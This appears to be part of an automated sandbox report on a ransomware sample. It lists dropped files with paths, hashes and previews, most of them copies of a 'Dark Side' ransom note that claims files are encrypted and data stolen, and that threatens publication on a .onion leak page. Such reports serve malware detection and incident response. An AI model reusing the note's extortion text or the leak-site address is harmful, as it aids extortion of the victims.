                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget.2c9ccbf3
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):147
                                                                                      Entropy (8bit):6.702940712124431
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:K/WR6TulDWAzALewzTaEegpCKxfqXjeM8wYkdduvqENn:K/WR6TqWOae2aEesCGfKjt8w0iEN
                                                                                      MD5:16C0DF9DBF28481841509F41E09CD06B
                                                                                      SHA1:EBF28D457E93919F0B1674059CF71FF2CC74987B
                                                                                      SHA-256:AE8EF7770A41C8F02DE986351CA2CE7BAC80C6A5730ADF3E0FAA72A30BB1D72B
                                                                                      SHA-512:DE900308B5E2120EF9C3A4D02FF59B206B810812E9474DB972CAF4B59913EB45C21F01AD2FD985A7E7C2426B5E382760BFB1964925487B9524B572743399E6C6
                                                                                      Malicious:false
                                                                                      Preview: ...).Fs.I.....V.B..@...4.'D..Y.S...S..B!.....we6x=../..l.L.g16.s..8.$)G.8..7...d.........w.n......u.9.;....)+3..r[.........3.._...o.;.p..[7. ..
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail.2c9ccbf3
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):148
                                                                                      Entropy (8bit):6.738004463528832
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:HGtr9OsqDGxO9NPnS7WeAWVu0CL2KM7i+ZZNlOp7gHPV5UpJ5eIsduF4ZB:O9Os3IfIWeASpKM7i+nNlY78VukqF+B
                                                                                      MD5:7B8ABA0DC762B20DD9C6D5D32AD23271
                                                                                      SHA1:7AA22AABE4A00C15580781DBF48EE119A47E4228
                                                                                      SHA-256:527899539201C1911FC59D2028BC5428EFA934E84CA43FC278390050112A5D4D
                                                                                      SHA-512:AFA84F55D86CCEB19DAF0B84216E94A93462C9D03EF6CF766EC7AE83F4E8D9DB8C4201E0EA5D75A26E1D9C60976070362D80A69E95CE75DCD34A215D9944FB6C
                                                                                      Malicious:false
                                                                                      Preview: ..b.a7.s. ,L...k.6I...n{{..|.k.U ....9_S..3~.F^f.&;%.pK............,..eH......).0U...Tg...>.^..-../.2z.#....K.hX...aPf\.QK.Z.p.8g...a.R.....L..
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Desktop\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Documents\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):5340
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:LwmxqbMcpdlO/LFz88QMs88XmxqbMcpdlO/LFz88QMs88W:8m0wcpdlOjFz2rbXm0wcpdlOjFz2rbW
                                                                                      MD5:8B4B7351CE1BEC0085228C2BDA959D4E
                                                                                      SHA1:7E38648E50AEBD99EB786C1EC68242DB775536DB
                                                                                      SHA-256:F907D383D6FC3D3C139BBDB97AA34167D2FA185008F402035D4AF20672AA0819
                                                                                      SHA-512:FE3F944F4A9760DB7E9D0B6C9D56A7CAF6AA691D2749DDD081A71255114BAA584BBE5F2AA7B096CAA3542E61491F38EA7B8DC42D393624EF323E977716261297
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Downloads\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Favorites\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
                                                                                      Preview: ----------- [ Welcome to Dark Side] ------------->....What happend?..----------------------------------------------..Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data...But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network...Follow our instructions below and you will recover all your data.....Data leak..----------------------------------------------..First of all we have uploaded more then 100 GB data.....Example of data:.. - Accounting data.. - Executive data.. - Sales data.. - Customer Support data.. - Marketing data.. - Quality data.. - And more other.......Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC..The data is preloaded and will be automatically published if you do not pay...After publication, your data will be available for
                                                                                      C:\Users\Default\Links\README.2c9ccbf3.TXT
                                                                                      Process:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2670
                                                                                      Entropy (8bit):5.442341646702788
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:L7WVOqZGKQx8NbSSUD4dcKn3p60lO/DXFz8R6VQMsHcXGvGlZ:LwmxqbMcpdlO/LFz88QMs88W
                                                                                      MD5:00F2E0214E12B6770923B1242DA68A3A
                                                                                      SHA1:F23FF75FCD924C3D8363279A9F6D18477A228D83
                                                                                      SHA-256:472D28010651900FF78C3B044603ECD4F8850F867B74E8B5717B051638D4E536
                                                                                      SHA-512:FE1AFE0A58724364F2064F2EF65B9EEFA758C3953FF5FD7CD84A10CF5A03E39F0DB73C193B57B99F24E290FB8FB8E4BA837D703DE84E9C5373E9D2C92A3448F2
                                                                                      Malicious:false
